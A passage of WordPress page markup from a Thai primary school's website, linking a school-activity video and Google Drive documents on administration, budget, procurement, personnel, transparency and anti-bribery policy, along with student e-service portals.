-->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" 